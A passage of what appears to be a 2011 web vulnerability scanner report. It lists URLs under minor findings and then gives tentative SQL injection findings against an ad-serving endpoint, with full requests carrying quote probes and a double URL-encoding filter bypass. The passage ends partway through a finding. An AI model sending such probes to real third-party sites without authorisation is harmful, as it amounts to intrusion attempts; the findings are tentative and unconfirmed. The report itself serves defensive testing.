24.25. http://static.ak.fbcdn.net/rsrc.php/v1/zX/r/i_oIVTKMYsL.png

24.26. http://static.ak.fbcdn.net/rsrc.php/v1/ze/r/nZW4C56WJb6.png

25. Social security numbers disclosed

26. Robots.txt file

26.1. http://67.228.151.70:81/statistics/logging/37KUDZMT2R

26.2. http://a.tribalfusion.com/j.ad

26.3. http://ad.afy11.net/ad

26.4. http://ad.technoratimedia.com/unpixel

26.5. http://ad.turn.com/server/ads.js

26.6. http://ad.yieldmanager.com/pixel

26.7. https://adwords.google.com/um/StartNewLogin

26.8. http://ajax.googleapis.com/ajax/libs/jquery/1.3.2/jquery.min.js

26.9. http://amch.questionmarket.com/adscgen/st.php

26.10. http://api.bizographics.com/v1/profile.redirect

26.11. http://api.facebook.com/restserver.php

26.12. http://apnxscm.ac3.msn.com:81/CACMSH.ashx

26.13. http://b.scorecardresearch.com/b

26.14. http://b.voicefive.com/b

26.15. http://bbc.112.2o7.net/b/ss/bbcwglobalprod/1/H.22.1/s91786168144611

26.16. http://beacon.afy11.net/ad

26.17. http://blog.domaintools.com/feed/

26.18. http://c.betrad.com/surly.js

26.19. http://cbk0.google.com/

26.20. http://cdn.turn.com/server/ddc.htm

26.21. http://cdn5.tribalfusion.com/media/2516896//frm.html

26.22. http://cgibin.erols.com/ziring/cgi-bin/nsgate/gate.pl

26.23. http://citi.bridgetrack.com/a/s/

26.24. http://citicorporate.d2.sc.omtrdc.net/b/ss/citiccitigroupcomprod/1/H.21/s84572543601971

26.25. http://clients1.google.com/generate_204

26.26. https://clients6.google.com/static/proxy.html

26.27. http://cm.g.doubleclick.net/pixel

26.28. http://cms.quantserve.com/dpixel

26.29. http://code.google.com/apis/maps/terms.html

26.30. http://community.spiceworks.com/r/595

26.31. http://dnsstuff.com/new-tools-a-upgrades

26.32. http://docs.google.com/

26.33. http://dyn.com/

26.34. http://feed.domaintoolsblog.com/domaintools/

26.35. http://feedinformer.com/

26.36. http://feeds.bbci.co.uk/news/rss.xml

26.37. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

26.38. http://gmf-aeroasia.co.id/

26.39. http://go.microsoft.com/fwlink/

26.40. http://googleads.g.doubleclick.net/pagead/ads

26.41. http://groups.google.com/groups

26.42. http://gtssldv-crl.geotrust.com/crls/gtssldv.crl

26.43. http://i1.ytimg.com/i/DVWCsxpo_gOkD9Rc4bL_gQ/1.jpg

26.44. http://ibid2252027210.peachd.dnsstuff.com/style.css

26.45. http://ibid2252027210.plumd.dnsstuff.com/style.css

26.46. http://in.getclicky.com/in.php

26.47. http://jqueryui.com/about

26.48. http://khm0.google.com/kh/v/x3d88/x26

26.49. http://khm1.google.com/kh/v/x3d88/x26

26.50. http://khmdb0.google.com/kh

26.51. http://khmdb1.google.com/kh

26.52. http://konax.kontera.com/publisher_tail/generatedPublisherConfig.js

26.53. http://legolas.nexac.com/lgalt

26.54. http://mail.google.com/mail/

26.55. http://maps.google.com/maps

26.56. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

26.57. http://metrics.citibank.com/b/ss/citinaprod/1/H.22.1/s89093963636551

26.58. http://meyerweb.com/eric/tools/css/reset/

26.59. http://mobilebeta.microsoft.com/office/communicatormobile/java/download.aspx

26.60. http://news.bbc.co.uk/2/hi/help/rss/4498287.stm

26.61. http://news.bbcimg.co.uk/js/newsi/latest/newsi.js

26.62. http://newsrss.bbc.co.uk/rss/newsonline_world_edition/front_page/rss.xml

26.63. http://pagead2.googlesyndication.com/pagead/show_ads.js

26.64. http://partner.domaining.com/link/

26.65. http://picasaweb.google.com/lh/view

26.66. https://plusone.google.com/u/0

26.67. http://r.turn.com/r/beacon

26.68. http://r1-ads.ace.advertising.com/site=783328/size=728090/u=2/bnum=10227708/hr=14/hl=1/c=3/scres=5/swh=1920x1200/tile=2/f=0/r=1/optn=1/fv=0/aolexp=1/dref=http%253A%252F%252Fwww.redmondpie.com%252Fjailbreak-4.3.4-ios-iphone-ipad-ipod-touch-using-pwnagetool-bundle-how-to-tutorial%252F

26.69. http://rd.rlcdn.com/rd

26.70. http://rt.legolas-media.com/lgrt

26.71. http://sa.bbc.co.uk/bbc/bbc/s

26.72. http://safebrowsing.clients.google.com/safebrowsing/downloads

26.73. http://satuit.com/

26.74. https://secure.domaintools.com/log-in/

26.75. http://segment-pixel.invitemedia.com/set_partner_uid

26.76. http://sites.google.com/

26.77. http://spe.atdmt.com/ds/NMMRTSHARWPH/Q1_WP7_ZuneOffer/MSCOM_WP7_Q4_ZuneOffer_160x600.jpg

26.78. http://ssl.gstatic.com/gb/js/sem_d8da90aa15552b1b6c43db160e9dbc9c.js

26.79. https://ssl.gstatic.com/gb/js/gcm_b1be572aff2630578d6077ebe3f660a9.js

26.80. http://support.dnsstuff.com/AvatarHandler.ashx

26.81. http://support.domaintools.com/

26.82. http://sync.mathtag.com/sync/img

26.83. http://tag.admeld.com/pixel

26.84. http://tf.nexac.com/media/1809966/na.html

26.85. http://translate.google.com/translate_t

26.86. http://turn.nexac.com/r/pu

26.87. http://webcache.googleusercontent.com/search

26.88. http://whois.domaintools.com/

26.89. http://whos.amung.us/pjswidget/

27. Cacheable HTTPS response

27.1. https://clients6.google.com/static/proxy.html

27.2. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

28. HTML does not specify charset

28.1. http://a.tribalfusion.com/p.media/aVmNBGSGbZa5AQZdmWAtTtQ80U3aXFQjXayOSFUGWUYPWHr2mbQtQbZbpYqYt3TBc2qvXmTMB1b39UWjXnmYZdnGYnptbH5EFk5tZaN46BGnbbZaYVbT1cr50cvupE7P5U3RWr7AV673PEnYPGUsQdUtYdftWmUu4GM1XrZbDXDmB9dNPwm/2522456/frame.html

28.2. http://a.tribalfusion.com/p.media/aWmNBGXWQAndPm4mJ15Vj9TcM7VsFiPPZbmTHYVWrbS2U6pWajrWan8Qa3ZcQVFARb6pRH7bUGjU4UmxnWEnXqPu3WfZbSGMD2mrHpH6yTHQ9Yrb61Ufg0EqqPrQDWUY3WHYYnUQoPU7sXa3t5EUc2qn3nEZbD1FfdUdMXyprwhXw8Do/2020316/frame.html

28.3. http://ad.doubleclick.net/adi/N3285.tribalfusion/B2343920.21

28.4. http://ad.doubleclick.net/adi/N5418.TribalFusion1.com/B5649401.5

28.5. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.28

28.6. http://ad.doubleclick.net/adi/N5823.152304.TRADEDESK/B5426163.29

28.7. http://amch.questionmarket.com/adscgen/st.php

28.8. http://analytics.microsoft.com/Sync.html

28.9. http://analytics.msn.com/Include.html

28.10. http://applenberry.com/tools/redmondpie.php

28.11. http://cache.vzw.com/scripts/globalnav/blank.html

28.12. http://cdn5.tribalfusion.com/media/1956006/frame.html

28.13. http://cdn5.tribalfusion.com/media/2516896//frm.html

28.14. http://cgibin.erols.com/favicon.ico

28.15. http://ds.addthis.com/red/psi/sites/www.healthcentral.com/p.json

28.16. http://feedinformer.com/

28.17. http://feedinformer.com/tg.php

28.18. http://ibid2252027210.peachd.dnsstuff.com/style.css

28.19. http://ibid2252027210.plumd.dnsstuff.com/style.css

28.20. http://ibid4216487243.plumd.dnsstuff.com/style.css

28.21. http://jqueryui.com/about

28.22. http://jqueryui.com/themeroller/

28.23. http://news.bbcimg.co.uk/view/1_0_6/wide/hi/shared/img/news_sprite_02.gif

28.24. http://ocsp.entrust.net/

28.25. http://odb.outbrain.com/utils/ping.html

28.26. http://p4.af2x4wmlt2kyi.bv53f33zp4ylturd.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/iframe.html

28.27. http://p4.af2x4wmlt2kyi.bv53f33zp4ylturd.if.v4.ipv6-exp.l.google.com/intl/en/ipv6/exp/redir.html

28.28. http://platform0.twitter.com/widgets/follow_button.html

28.29. http://platform1.twitter.com/widgets/follow_button.html

28.30. http://satuit.com/favicon.ico

28.31. http://sensor2.suitesmart.com/sensor4.js

28.32. http://switch.atdmt.com/iaction/bestbuy_page/v3/catName.Mobile%20Plans/catId.pcmcat203600050025/recognized.Anonymous/language.en/secChannel.0/skuList.9867653%2C9867644%2C9867608%2C9867592%2C9867574%2C9867486/catalyst_id.%5BCS%5Dv1|27121715051D30BA-40000107E02681AE%5BCE%5D/cache.49234257

28.33. http://tf.nexac.com/media/1809966/na.html

28.34. http://uac.advertising.com/wrapper/aceUACping.htm

29. HTML uses unrecognised charset

30. Content type incorrectly stated

30.1. http://a.rad.msn.com/ADSAdClient31.dll

30.2. http://a1.twimg.com/profile_images/336090389/CM_linkedin_normal.gif

30.3. http://a3.twimg.com/profile_images/348452570/NewLogo_normal.gif

30.4. http://amch.questionmarket.com/adscgen/st.php

30.5. http://api.twitter.com/1/urls/resolve.json

30.6. http://cache.vzw.com/fonts/verizonApex-book-ex.woff

30.7. http://cache.vzw.com/globalnav/globalnavmenu.txt

30.8. https://fpdownload.macromedia.com/get/flashplayer/current/swflash.cab

30.9. http://i3.social.s-msft.com/Forums/en-US/resources.js

30.10. http://ibid2252027210.peachd.dnsstuff.com/style.css

30.11. http://ibid2252027210.plumd.dnsstuff.com/style.css

30.12. http://ibid4216487243.plumd.dnsstuff.com/style.css

30.13. http://jqueryui.com/themeroller/images/themeGallery/theme_90_ui_light.png

30.14. http://kona5.kontera.com/KonaGet.js

30.15. http://lookupserver.com/favicon.ico

30.16. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur

30.17. http://rad.msn.com/ADSAdClient31.dll

30.18. http://rtb0.doubleverify.com/rtb.ashx/verifyc

30.19. http://s3.buysellads.com/1239116/63402-1307193749.gif

30.20. http://s3.buysellads.com/1239116/65107-1308490127.gif

30.21. http://sales.liveperson.net/hcp/html/mTag.js

30.22. http://satuit.com/favicon.ico

30.23. http://sensor2.suitesmart.com/sensor4.js

30.24. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard

30.25. http://whos.amung.us/psrvwidget/

31. Content type is not specified

31.1. http://gmf-aeroasia.co.id/favicon.ico

31.2. http://paid.outbrain.com/network/redir

31.3. http://simplexityllc.tt.omtrdc.net/m2/simplexityllc/mbox/standard

31.4. http://verizonwireless.tt.omtrdc.net/m2/verizonwireless/mbox/standard



1. SQL injection  next
There are 5 instances of this issue:

Issue background

SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.

Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.

Remediation background

The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.

You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:



1.1. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The bpp parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the bpp parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the bpp request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311007931&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311007931738&bpp=1%2527&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264%2C2520014514&correlator=1311007922811&frm=4&adk=1308792938&ga_vid=1596259680.1311007547&ga_sid=1311007923&ga_hid=373783176&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&biw=1315&bih=853&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=4&dtd=31&xpc=YknUSNb59R&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 16:58:22 GMT
Server: cafe
Cache-Control: private
Content-Length: 12758
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
YaHR0cDovL2xvb2t1cHNlcnZlci5jb20v4AEEgAIBqAMByAMf6AM16AP2COgDowX1AwAAAMQ&num=2&sig=AOD64_2N1HfGG5Yn1ORL9lB-ECoF3FTcbQ&client=ca-pub-6114143813287942&adurl=http://info.arcsight.com/content/Google-FixThyErrors%3F_kk%3Dserver%2520log%2520analyzer%26_kt%3Df770026c-4db3-48ef-8558-542126e42c16" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=_b
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311007931&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311007931738&bpp=1%2527%2527&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264%2C2520014514&correlator=1311007922811&frm=4&adk=1308792938&ga_vid=1596259680.1311007547&ga_sid=1311007923&ga_hid=373783176&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&biw=1315&bih=853&ref=http%3A%2F%2Fburp%2Fshow%2F40&fu=0&ifi=4&dtd=31&xpc=YknUSNb59R&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 16:58:23 GMT
Server: cafe
Cache-Control: private
Content-Length: 12588
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#0000ff}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.2. http://googleads.g.doubleclick.net/pagead/ads [dt parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The dt parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the dt parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the dt request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783%2527&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:20:49 GMT
Server: cafe
Cache-Control: private
Content-Length: 5426
X-XSS-Protection: 1; mode=block

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783%2527%2527&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:20:51 GMT
Server: cafe
Cache-Control: private
Content-Length: 14221
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...

1.3. http://googleads.g.doubleclick.net/pagead/ads [ga_vid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ga_vid parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ga_vid parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311008282&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311008282478&bpp=3&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264&correlator=1311008279306&frm=4&adk=2516592769&ga_vid=1596259680.1311007547'&ga_sid=1311008279&ga_hid=429620988&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&dff=times%20new%20roman&dfs=16&biw=1331&bih=853&eid=33895299&ref=http%3A%2F%2Fburp%2Fshow%2F51&fu=0&ifi=3&dtd=167&xpc=4A4EV9HiBw&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 17:08:39 GMT
Server: cafe
Cache-Control: private
Content-Length: 5579
X-XSS-Protection: 1; mode=block
Expires: Mon, 18 Jul 2011 17:08:39 GMT

<html><head><script><!--
(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime();this.t[d]=[f,e]};this.tick("start",null,c)}var g=new a;window.jstiming={Timer:a,lo
...[SNIP]...
"?v=3","&s="+(window.jstiming.sn||"pagead")+"&action=",b.name,j.length?"&it="+j.join(","):"","",f,"&rt=",m.join(",")].join("");a=new Image;var o=window.jstiming.c++;window.jstiming.a[o]=a;a.onload=a.onerror=function(){delete window.jstiming.a[o]};a.src=b;a=null;return b}};var i=window.jstiming.load;function l(b,a){var e=parseInt(b,10);if(e>
...[SNIP]...

Request 2

GET /pagead/ads?client=ca-pub-6114143813287942&output=html&h=90&slotname=2520014514&w=728&lmt=1311008282&flash=0&url=http%3A%2F%2Flookupserver.com%2F&dt=1311008282478&bpp=3&shv=r20110713&jsv=r20110627&prev_slotnames=9275304152%2C0304811264&correlator=1311008279306&frm=4&adk=2516592769&ga_vid=1596259680.1311007547''&ga_sid=1311008279&ga_hid=429620988&ga_fc=1&u_tz=-300&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=0&u_nmime=0&dff=times%20new%20roman&dfs=16&biw=1331&bih=853&eid=33895299&ref=http%3A%2F%2Fburp%2Fshow%2F51&fu=0&ifi=3&dtd=167&xpc=4A4EV9HiBw&p=http%3A//lookupserver.com HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://lookupserver.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: googleads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response 2

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 17:08:40 GMT
Server: cafe
Cache-Control: private
Content-Length: 3724
X-XSS-Protection: 1; mode=block
Expires: Mon, 18 Jul 2011 17:08:40 GMT

<html><head><style><!--
a:link { color: #000000 }a:visited { color: #000000 }a:hover { color: #000000 }a:active { color: #000000 } --></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...

1.4. http://googleads.g.doubleclick.net/pagead/ads [ifi parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The ifi parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the ifi parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /pagead/ads?client=ca-pub-1026799836550757&output=html&h=90&slotname=1466459842&w=728&lmt=1310954320&flash=0&url=http%3A%2F%2Fwww.dnsstuff.com%2Ftools%2Fipall%2F%3Ftool_id%3D67%26token%3D%26toolhandler_redirect%3D0%26ip%3D209.235.10.84&dt=1310954338783&bpp=31&shv=r20110713&jsv=r20110627&correlator=1310954340965&frm=4&adk=502184604&ga_vid=362391004.1310954302&ga_sid=1310954302&ga_hid=2109667182&ga_fc=1&u_tz=-300&u_his=4&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&u_nplug=4&u_nmime=36&biw=981&bih=652&ref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&fu=0&ifi=1'&dtd=6443&xpc=aMfwJ5lKdK&p=http%3A//www.dnsstuff.com HTTP/1.1
Host: googleads.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.dnsstuff.com/tools/ipall/?tool_id=67&token=&toolhandler_redirect=0&ip=209.235.10.84
Cookie: id=2253b03f0e0100a7|1365243/25505/15169|t=1308836888|et=730|cs=002213fd481abe33e2cc59585e

Response 1

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Mon, 18 Jul 2011 02:52:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 14183
X-XSS-Protection: 1; mode=block

<!doctype html><html><head><style>a{color:#3780c3}body,table,div,ul,li{margin:0;padding:0}</style><script>(function(){window.ss=function(d,e){window.status=d;var c=document.getElementById(e);if(c){var
...[SNIP]...
va2VuPSZ0b29saGFuZGxlcl9yZWRpcmVjdD0wJmlwPTIwOS4yMzUuMTAuODSAAgGoAwHIAxc&num=2&sig=AOD64_03toXT7WfAAjyKK1dUd9HdHUgGOw&client=ca-pub-1026799836550757&adurl=http://info.arcsight.com/content/Google-FixThyErrors%3F_kk%3Dlog%2520analyzer%2520software%26_kt%3D78285438-606d-4d0e-9b34-ce1db027b29a" id=aw1 onclick="ha('aw1')" onfocus="ss('','aw1')" onmousedown="st('aw1')" onmouseover="return ss('','aw1')" target=
...[SNIP]...

Request 2

